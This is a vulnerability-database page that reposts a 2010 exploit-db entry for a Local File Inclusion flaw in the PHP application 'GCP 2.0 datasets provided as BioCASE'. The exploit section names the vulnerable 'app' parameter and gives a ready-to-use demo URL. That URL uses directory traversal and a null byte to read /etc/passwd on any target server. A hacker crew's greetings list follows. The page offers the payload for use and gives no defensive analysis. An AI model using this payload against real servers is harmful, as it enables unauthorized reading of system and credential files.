GCP 2.0 datasets provided as BioCASE Web services - Local File Inclusion

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1059151 漏洞类型
发布时间 2010-02-02 更新时间 2010-02-02
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/11316
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
========================================================================
#   .::GCP 2.0 datasets provided as BioCASE web services::.            #
#                  (Local File Inclusion)                              #
========================================================================
========================================================================
Author  : R3VAN_BASTARD
Site    : www.sux0r.net
Provider: http://www.biocase.org
========================================================================
[x] Vulnerability:/index.php?app=
========================================================================
[x] demo:
http://[server]/index.php?app=../../../../../../../../../etc/passwd%00&inc=dataset_details&dataset_id=625
http://[server]/index.php?app=../../../../../../../../../etc/passwd%00&inc=dataset_details&dataset_id=625
=========================================================================
saludos cordiales:
VALENCIA : S3T4N : YOGA0400 : JACK (PAMAN) : VRS-HCK : YADOY666
NOGE : OON_BOY : MADONK : KECEMPLUNG-KALEN : YUDIS : DECLINED
BADFELLAS.co : ALL HIP-HOP "satu atap" : BASS PRO "rhythm and Distortion"
MAINHACK : SERVER IS DOWN : ALL POINT BLANK PLAYER FEEL THE HEAD SHOT
=========================================================================